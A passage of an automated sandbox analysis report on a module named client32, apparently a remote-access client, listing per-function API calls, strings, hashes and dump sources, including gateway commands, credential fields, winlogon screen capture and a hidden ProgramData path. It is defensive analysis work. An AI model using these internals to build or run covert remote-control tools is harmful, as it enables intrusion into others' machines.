                                                                                                • API String ID: 348974188-2591373181
                                                                                                • Opcode ID: 2b78c885ca7092d50f7b3971725b2a7c7ff69b286f2b648b2b9de1ef00c0ff8f
                                                                                                • Instruction ID: c6fb8941b728de1d874c8cf5bae9c94d2d097e9c1a5b8d4b24900e8511d45065
                                                                                                • Opcode Fuzzy Hash: 2b78c885ca7092d50f7b3971725b2a7c7ff69b286f2b648b2b9de1ef00c0ff8f
                                                                                                • Instruction Fuzzy Hash: A2C17DB1D0066A9FDB22DF658D846ADFAB8BB09314F4141FAE65CE7280D7309B84CF51
                                                                                                Function 69CF58B0 Relevance: 40.5, APIs: 7, Strings: 16, Instructions: 262stringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$_memset$lstrlen
                                                                                                • String ID: *ControlPort$*Gsk$AT=%d$CHANNEL=%s$CMD=BROADCASTDATA$CSPEC=%s$DATA=$FLAGS=%u$FROM=%s:%d$GSK=%s$Gateway_Gsk$LEN=%d$ListenPort$Port$TCPIP$ctl_broadcastdata - INVALID PARAMETER
                                                                                                • API String ID: 1776203170-3520600413
                                                                                                • Opcode ID: e822760335fc2ed93ed5c2d5fbf8eea2bf4051630e09075bd4972d4210f5c5e1
                                                                                                • Instruction ID: 284ebd96a7be5e7efd8b1b0c1a2acfc1eb59ef67c71c4833431e70262cd45ce5
                                                                                                • Opcode Fuzzy Hash: e822760335fc2ed93ed5c2d5fbf8eea2bf4051630e09075bd4972d4210f5c5e1
                                                                                                • Instruction Fuzzy Hash: 7DA188B5900218ABDB54DB64DC98FAF737CAF45308F4095E9F249A7540FB309B858F61
                                                                                                Function 69CEEEA0 Relevance: 40.4, APIs: 21, Strings: 2, Instructions: 182sleepsynchronizationthreadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SetEvent.KERNEL32(00000180), ref: 69CEEEC7
                                                                                                • WaitForSingleObject.KERNEL32(00000184,00001388), ref: 69CEEED5
                                                                                                • TerminateThread.KERNEL32(00000184,000000FF), ref: 69CEEEF5
                                                                                                • CloseHandle.KERNEL32(00000184), ref: 69CEEF07
                                                                                                • SetEvent.KERNEL32(00000174), ref: 69CEEF16
                                                                                                • ctl_hangup.HTCTL32(00000001), ref: 69CEEF26
                                                                                                • Sleep.KERNEL32(00000014), ref: 69CEEFB8
                                                                                                • CloseHandle.KERNEL32(00000180), ref: 69CEEFCE
                                                                                                • CloseHandle.KERNEL32(0000017C), ref: 69CEEFD6
                                                                                                • CloseHandle.KERNEL32(00000174), ref: 69CEEFDF
                                                                                                • WSACleanup.WSOCK32 ref: 69CEEFE9
                                                                                                • CloseHandle.KERNEL32(00000188), ref: 69CEEFFB
                                                                                                • DeleteCriticalSection.KERNEL32(00000002), ref: 69CEF01F
                                                                                                • DeleteCriticalSection.KERNEL32(69D2B898), ref: 69CEF03A
                                                                                                • _free.LIBCMT ref: 69CEF043
                                                                                                  • Part of subcall function 69D01BFD: HeapFree.KERNEL32(00000000,00000000), ref: 69D01C13
                                                                                                  • Part of subcall function 69D01BFD: GetLastError.KERNEL32(00000000), ref: 69D01C25
                                                                                                • _free.LIBCMT ref: 69CEF04F
                                                                                                • _free.LIBCMT ref: 69CEF07B
                                                                                                • _free.LIBCMT ref: 69CEF08D
                                                                                                • _memset.LIBCMT ref: 69CEF0A1
                                                                                                • FreeLibrary.KERNEL32(?), ref: 69CEF0BB
                                                                                                • timeEndPeriod.WINMM(00000001), ref: 69CEF0D6
                                                                                                  • Part of subcall function 69CE4610: DeleteCriticalSection.KERNEL32(-00000008,?), ref: 69CE4698
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandle$_free$CriticalDeleteSection$EventFree$CleanupErrorHeapLastLibraryObjectPeriodSingleSleepTerminateThreadWait_memsetctl_hanguptime
                                                                                                • String ID: CMD=CLOSE$Error. Terminating httprecv Thread
                                                                                                • API String ID: 2861375113-448471891
                                                                                                • Opcode ID: 1ca8514a6c0fed55a89814022bd8c7fd2b5594919f5c58c291a394bc65a3768d
                                                                                                • Instruction ID: 4e994568de198f35eefd0511d996d858a85b12392279058018e79aa8f71df563
                                                                                                • Opcode Fuzzy Hash: 1ca8514a6c0fed55a89814022bd8c7fd2b5594919f5c58c291a394bc65a3768d
                                                                                                • Instruction Fuzzy Hash: 135180B59002459FFF10DFB8EC90B6B73A8AB46344B40C479E616E3680EB75E9408BB1
                                                                                                Function 69D07127 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,69D058B5,69D27218,00000008,69D05A49,?,?,?,69D27238,0000000C,69D05B04,?), ref: 69D0712F
                                                                                                • __mtterm.LIBCMT ref: 69D0713B
                                                                                                  • Part of subcall function 69D06DFA: DecodePointer.KERNEL32(00000007,69D05978,69D0595E,69D27218,00000008,69D05A49,?,?,?,69D27238,0000000C,69D05B04,?), ref: 69D06E0B
                                                                                                  • Part of subcall function 69D06DFA: TlsFree.KERNEL32(00000021,69D05978,69D0595E,69D27218,00000008,69D05A49,?,?,?,69D27238,0000000C,69D05B04,?), ref: 69D06E25
                                                                                                  • Part of subcall function 69D06DFA: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,69D05978,69D0595E,69D27218,00000008,69D05A49,?,?,?,69D27238,0000000C,69D05B04,?), ref: 69D0F391
                                                                                                  • Part of subcall function 69D06DFA: _free.LIBCMT ref: 69D0F394
                                                                                                  • Part of subcall function 69D06DFA: DeleteCriticalSection.KERNEL32(00000021,?,?,69D05978,69D0595E,69D27218,00000008,69D05A49,?,?,?,69D27238,0000000C,69D05B04,?), ref: 69D0F3BB
                                                                                                • GetProcAddress.KERNEL32(00000000,FlsAlloc,?,?,69D058B5,69D27218,00000008,69D05A49,?,?,?,69D27238,0000000C,69D05B04,?), ref: 69D07151
                                                                                                • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,?,69D058B5,69D27218,00000008,69D05A49,?,?,?,69D27238,0000000C,69D05B04,?), ref: 69D0715E
                                                                                                • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,?,69D058B5,69D27218,00000008,69D05A49,?,?,?,69D27238,0000000C,69D05B04,?), ref: 69D0716B
                                                                                                • GetProcAddress.KERNEL32(00000000,FlsFree,?,?,69D058B5,69D27218,00000008,69D05A49,?,?,?,69D27238,0000000C,69D05B04,?), ref: 69D07178
                                                                                                • TlsAlloc.KERNEL32(?,?,69D058B5,69D27218,00000008,69D05A49,?,?,?,69D27238,0000000C,69D05B04,?), ref: 69D071C8
                                                                                                • TlsSetValue.KERNEL32(00000000,?,?,69D058B5,69D27218,00000008,69D05A49,?,?,?,69D27238,0000000C,69D05B04,?), ref: 69D071E3
                                                                                                • __init_pointers.LIBCMT ref: 69D071ED
                                                                                                • EncodePointer.KERNEL32(?,?,69D058B5,69D27218,00000008,69D05A49,?,?,?,69D27238,0000000C,69D05B04,?), ref: 69D071FE
                                                                                                • EncodePointer.KERNEL32(?,?,69D058B5,69D27218,00000008,69D05A49,?,?,?,69D27238,0000000C,69D05B04,?), ref: 69D0720B
                                                                                                • EncodePointer.KERNEL32(?,?,69D058B5,69D27218,00000008,69D05A49,?,?,?,69D27238,0000000C,69D05B04,?), ref: 69D07218
                                                                                                • EncodePointer.KERNEL32(?,?,69D058B5,69D27218,00000008,69D05A49,?,?,?,69D27238,0000000C,69D05B04,?), ref: 69D07225
                                                                                                • DecodePointer.KERNEL32(Function_00026F7E,?,?,69D058B5,69D27218,00000008,69D05A49,?,?,?,69D27238,0000000C,69D05B04,?), ref: 69D07246
                                                                                                • __calloc_crt.LIBCMT ref: 69D0725B
                                                                                                • DecodePointer.KERNEL32(00000000,?,?,69D058B5,69D27218,00000008,69D05A49,?,?,?,69D27238,0000000C,69D05B04,?), ref: 69D07275
                                                                                                • GetCurrentThreadId.KERNEL32(?,?,69D058B5,69D27218,00000008,69D05A49,?,?,?,69D27238,0000000C,69D05B04,?), ref: 69D07287
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                • API String ID: 3698121176-3819984048
                                                                                                • Opcode ID: 46b49f3ea8e53cd7cb23f59baeb91aeb105a4619558950fbc1d8e6c84b55d1aa
                                                                                                • Instruction ID: 94c285fa39e10872d3170c5d40f298938f65475f9d09eae8a95117f2e6ea26a1
                                                                                                • Opcode Fuzzy Hash: 46b49f3ea8e53cd7cb23f59baeb91aeb105a4619558950fbc1d8e6c84b55d1aa
                                                                                                • Instruction Fuzzy Hash: 0B314B71800291EAFF029F75CD1870A3FA5FF67264B1A8637EA64DB690DBB580408F60
                                                                                                Function 69CE2CE0 Relevance: 38.6, APIs: 11, Strings: 11, Instructions: 58libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 69CE2A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 69CE2ACB
                                                                                                  • Part of subcall function 69CE2A90: _strrchr.LIBCMT ref: 69CE2ADA
                                                                                                  • Part of subcall function 69CE2A90: _strrchr.LIBCMT ref: 69CE2AEA
                                                                                                  • Part of subcall function 69CE2A90: wsprintfA.USER32 ref: 69CE2B05
                                                                                                • GetModuleHandleA.KERNEL32(NSMTRACE,69CE2AB1), ref: 69CE2CFA
                                                                                                • GetProcAddress.KERNEL32(00000000,NSMTraceLoad), ref: 69CE2D15
                                                                                                • GetProcAddress.KERNEL32(00000000,NSMTraceUnload), ref: 69CE2D22
                                                                                                • GetProcAddress.KERNEL32(00000000,NSMTraceGetConfigItem), ref: 69CE2D2F
                                                                                                • GetProcAddress.KERNEL32(00000000,NSMTraceGetConfigInt), ref: 69CE2D3C
                                                                                                • GetProcAddress.KERNEL32(00000000,vRealNSMTrace), ref: 69CE2D49
                                                                                                • GetProcAddress.KERNEL32(00000000,NSMTraceClose), ref: 69CE2D56
                                                                                                • GetProcAddress.KERNEL32(00000000,NSMTraceReadConfigItemFromFile), ref: 69CE2D63
                                                                                                • GetProcAddress.KERNEL32(00000000,NSMTraceExclusive), ref: 69CE2D70
                                                                                                • GetProcAddress.KERNEL32(00000000,NSMTraceUnexclusive), ref: 69CE2D7D
                                                                                                • GetProcAddress.KERNEL32(00000000,NSMTraceSetModuleName), ref: 69CE2D8A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$Module_strrchr$FileHandleNamewsprintf
                                                                                                • String ID: NSMTRACE$NSMTraceClose$NSMTraceExclusive$NSMTraceGetConfigInt$NSMTraceGetConfigItem$NSMTraceLoad$NSMTraceReadConfigItemFromFile$NSMTraceSetModuleName$NSMTraceUnexclusive$NSMTraceUnload$vRealNSMTrace
                                                                                                • API String ID: 3896832720-3703587661
                                                                                                • Opcode ID: 2a92d6f075515fa098694df72f6405713c4acb9c75c9cf85a7cec1c00e288519
                                                                                                • Instruction ID: 474e07fc1dd62940463064372fdb1fa754eeceed820f4d000bf17a82943d9d92
                                                                                                • Opcode Fuzzy Hash: 2a92d6f075515fa098694df72f6405713c4acb9c75c9cf85a7cec1c00e288519
                                                                                                • Instruction Fuzzy Hash: 5601D2B0C612A466EB50EB79DC18F9E3A98AFE6395B818536F300F3900F6744005CFB1
                                                                                                Function 1105D240 Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 124filewindowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • OpenFileMappingA.KERNEL32 ref: 1105D277
                                                                                                • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 1105D294
                                                                                                • GetDC.USER32(00000000), ref: 1105D2BB
                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 1105D2CF
                                                                                                • CreateDIBSection.GDI32(00000000,00000004,00000000,?,?,?), ref: 1105D2F2
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 1105D300
                                                                                                • GetTickCount.KERNEL32 ref: 1105D30F
                                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 1105D333
                                                                                                • GetTickCount.KERNEL32 ref: 1105D33C
                                                                                                • GetLastError.KERNEL32(?), ref: 1105D348
                                                                                                • GdiFlush.GDI32 ref: 1105D35C
                                                                                                • SelectObject.GDI32(00000000,?), ref: 1105D367
                                                                                                • DeleteObject.GDI32(00000000), ref: 1105D36E
                                                                                                • DeleteDC.GDI32(00000000), ref: 1105D378
                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 1105D384
                                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 1105D38E
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 1105D396
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileObject$CountCreateDeleteSelectTickView$CloseCompatibleErrorFlushHandleLastMappingOpenReleaseSectionUnmap
                                                                                                • String ID: /thumb:$Error %d blitting from winlogon, took %d ms$ThumbWL
                                                                                                • API String ID: 652520247-4094952007
                                                                                                • Opcode ID: 8f5b295e94eaa7f285b731955c0fd9ff915ca6e09ee39c0381679d34cd356cea
                                                                                                • Instruction ID: 78b6d8997dae8530c3cf648a665dcf4201cc58d59c57f0d4bee68b800920de56
                                                                                                • Opcode Fuzzy Hash: 8f5b295e94eaa7f285b731955c0fd9ff915ca6e09ee39c0381679d34cd356cea
                                                                                                • Instruction Fuzzy Hash: 924190B9E41229AFD704CFA4DD89FAEBBB8FB48704F104165F920A7644D730A901CBA1
                                                                                                Function 69CF4CF0 Relevance: 33.4, APIs: 9, Strings: 10, Instructions: 196COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 69CF4D1C
                                                                                                • _free.LIBCMT ref: 69CF4E16
                                                                                                • _free.LIBCMT ref: 69CF4E5D
                                                                                                • _free.LIBCMT ref: 69CF4E8B
                                                                                                • _free.LIBCMT ref: 69CF4EB9
                                                                                                  • Part of subcall function 69CF7B60: _sprintf.LIBCMT ref: 69CF7B77
                                                                                                  • Part of subcall function 69CF77E0: _free.LIBCMT ref: 69CF77EF
                                                                                                • _free.LIBCMT ref: 69CF4EF6
                                                                                                  • Part of subcall function 69CE63C0: EnterCriticalSection.KERNEL32(69D2B898,00000000,?,00000000,?,69CED77B,00000000), ref: 69CE63E8
                                                                                                  • Part of subcall function 69CE63C0: InterlockedDecrement.KERNEL32(-0003F3B7,?,00000000,?,69CED77B,00000000), ref: 69CE63FA
                                                                                                  • Part of subcall function 69CE63C0: EnterCriticalSection.KERNEL32(-0003F3CF,?,00000000,?,69CED77B,00000000), ref: 69CE6412
                                                                                                  • Part of subcall function 69CE63C0: GetProcAddress.KERNEL32(?,InternetCloseHandle,?,00000000,?,69CED77B,00000000), ref: 69CE643B
                                                                                                  • Part of subcall function 69CE63C0: GetProcAddress.KERNEL32(?,InternetCloseHandle,?,00000000,?,69CED77B,00000000), ref: 69CE646F
                                                                                                  • Part of subcall function 69CE63C0: GetProcAddress.KERNEL32(?,InternetCloseHandle,?,00000000,?,69CED77B,00000000), ref: 69CE64A3
                                                                                                  • Part of subcall function 69CE63C0: _memset.LIBCMT ref: 69CE65C8
                                                                                                  • Part of subcall function 69CE63C0: LeaveCriticalSection.KERNEL32(?,?,69CED77B,00000000), ref: 69CE65D7
                                                                                                  • Part of subcall function 69CE63C0: LeaveCriticalSection.KERNEL32(69D2B898,?,00000000,?,69CED77B,00000000), ref: 69CE65F2
                                                                                                • _free.LIBCMT ref: 69CF4EED
                                                                                                  • Part of subcall function 69D01BFD: HeapFree.KERNEL32(00000000,00000000), ref: 69D01C13
                                                                                                  • Part of subcall function 69D01BFD: GetLastError.KERNEL32(00000000), ref: 69D01C25
                                                                                                • _free.LIBCMT ref: 69CF4F09
                                                                                                • SetLastError.KERNEL32(?), ref: 69CF4F12
                                                                                                  • Part of subcall function 69CE8C30: _memset.LIBCMT ref: 69CE8C5B
                                                                                                  • Part of subcall function 69CE8C30: _free.LIBCMT ref: 69CE8CCC
                                                                                                  • Part of subcall function 69CE8B50: _memset.LIBCMT ref: 69CE8B68
                                                                                                  • Part of subcall function 69CE8B50: wsprintfA.USER32 ref: 69CE8B87
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$CriticalSection_memset$AddressProc$EnterErrorLastLeave$DecrementFreeHeapInterlocked_sprintfwsprintf
                                                                                                • String ID: CMD=PUTFILELINK$FNAME=%s$GSK=%s$Gateway_Gsk$Gateway_Operator$Gateway_Password$LINK=%s$ON=%s$PWD=%s$SUB=%s
                                                                                                • API String ID: 2025600352-1925890548
                                                                                                • Opcode ID: 296d44955d813e3465d0fc15c47e1784bd46bc210a3091e3c4eafdf4ec7480c2
                                                                                                • Instruction ID: ba0e00ece6690ab8139604ac43f2c0fc5e05084ff6d1df73d0db77ec1f4dbee3
                                                                                                • Opcode Fuzzy Hash: 296d44955d813e3465d0fc15c47e1784bd46bc210a3091e3c4eafdf4ec7480c2
                                                                                                • Instruction Fuzzy Hash: C56181B6C00208ABDB11DFE4DC54FEEB7B8AF45708F50902DE615BB645EB31A506CBA1
                                                                                                Function 69D01130 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 164libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(winhttp.dll), ref: 69D01177
                                                                                                • GetProcAddress.KERNEL32(00000000,WinHttpGetIEProxyConfigForCurrentUser), ref: 69D011AE
                                                                                                • GlobalFree.KERNEL32(?), ref: 69D011D4
                                                                                                • GlobalFree.KERNEL32(?), ref: 69D011E5
                                                                                                • GetProcAddress.KERNEL32(00000000,WinHttpOpen), ref: 69D01207
                                                                                                • GetProcAddress.KERNEL32(00000000,WinHttpGetProxyForUrl), ref: 69D012AD
                                                                                                • __strdup.LIBCMT ref: 69D012FC
                                                                                                • GlobalFree.KERNEL32(?), ref: 69D0130D
                                                                                                • GlobalFree.KERNEL32(?), ref: 69D01328
                                                                                                • GetProcAddress.KERNEL32(00000000,WinHttpCloseHandle), ref: 69D01334
                                                                                                • GlobalFree.KERNEL32(?), ref: 69D0134E
                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 69D01359
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Free$Global$AddressProc$Library$Load__strdup
                                                                                                • String ID: NS247$WinHttpCloseHandle$WinHttpGetIEProxyConfigForCurrentUser$WinHttpGetProxyForUrl$WinHttpOpen$winhttp.dll
                                                                                                • API String ID: 3412555560-1656063788
                                                                                                • Opcode ID: 28eac09fee71c9a26dbe45b3d5c588f38f14d3e46593845acdb909a7ae67739f
                                                                                                • Instruction ID: 94b90eda2e5036ba0c55760b6a128e2f44127c5fc1925126862ad146e4e33370
                                                                                                • Opcode Fuzzy Hash: 28eac09fee71c9a26dbe45b3d5c588f38f14d3e46593845acdb909a7ae67739f
                                                                                                • Instruction Fuzzy Hash: F0514BB1A00268DBEB60DFA5CC54BDEB7B8BF49744F4041A9E51CE7A40EB319A84CF50
                                                                                                Function 69CE50E0 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 120fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,nextfileindex,00000001,C:\ProgramData\i99ekubc\Support\pci.ini), ref: 69CE5131
                                                                                                • wsprintfA.USER32 ref: 69CE514A
                                                                                                • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 69CE5168
                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 69CE5172
                                                                                                • GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,maxfilesize,000003E8,C:\ProgramData\i99ekubc\Support\pci.ini), ref: 69CE5191
                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 69CE51B2
                                                                                                • FlushFileBuffers.KERNEL32(00000000,?,69CE9B16,00000001), ref: 69CE51D8
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 69CE51E4
                                                                                                • wsprintfA.USER32 ref: 69CE5225
                                                                                                • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 69CE5243
                                                                                                • __itow.LIBCMT ref: 69CE5265
                                                                                                • WritePrivateProfileStringA.KERNEL32(htctl.packet_tracing,nextfileindex,00000000), ref: 69CE5278
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$PrivateProfile$Createwsprintf$BuffersCloseFlushHandlePointerSizeStringWrite__itow
                                                                                                • String ID: %spacket%03d.trc$C:\ProgramData\i99ekubc\Support\$C:\ProgramData\i99ekubc\Support\pci.ini$htctl.packet_tracing$maxfilesize$nextfileindex
